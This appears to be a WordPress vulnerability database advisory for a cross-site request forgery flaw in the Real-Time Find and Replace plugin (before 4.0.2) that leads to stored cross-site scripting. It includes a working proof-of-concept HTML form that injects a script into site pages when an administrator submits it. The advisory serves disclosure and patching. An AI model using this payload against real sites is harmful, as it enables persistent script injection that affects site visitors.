Real-Time Find and Replace < 4.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting



Description
"This flaw could allow any user to inject malicious Javascript anywhere on a site if they could trick a site’s administrator into performing an action, like clicking on a link in a comment or email."
Proof of Concept
<html>
  <body>
    <form action="http://URL/wp-admin/tools.php?page=real-time-find-and-replace" method="POST">
      <input type="hidden" name="setup&#45;update" value="" />
      <input type="hidden" name="farfind&#91;0&#93;" value="&lt;head&gt;" />
      <input type="hidden" name="farreplace&#91;0&#93;" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 4.0.2

References

URL https://www.wordfence.com/blog/2020/04/high-severity-vulnerability-patched-in-real-time-find-and-replace-plugin/
URL https://plugins.trac.wordpress.org/changeset/2289725/real-time-find-and-replace

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Views 1268
Verified No
WPVDB ID 10193

Timeline

Publicly Published 2020-04-27 (about 1 month ago)
Added 2020-04-27 (29 days ago)
Last Updated 2020-04-28 (29 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin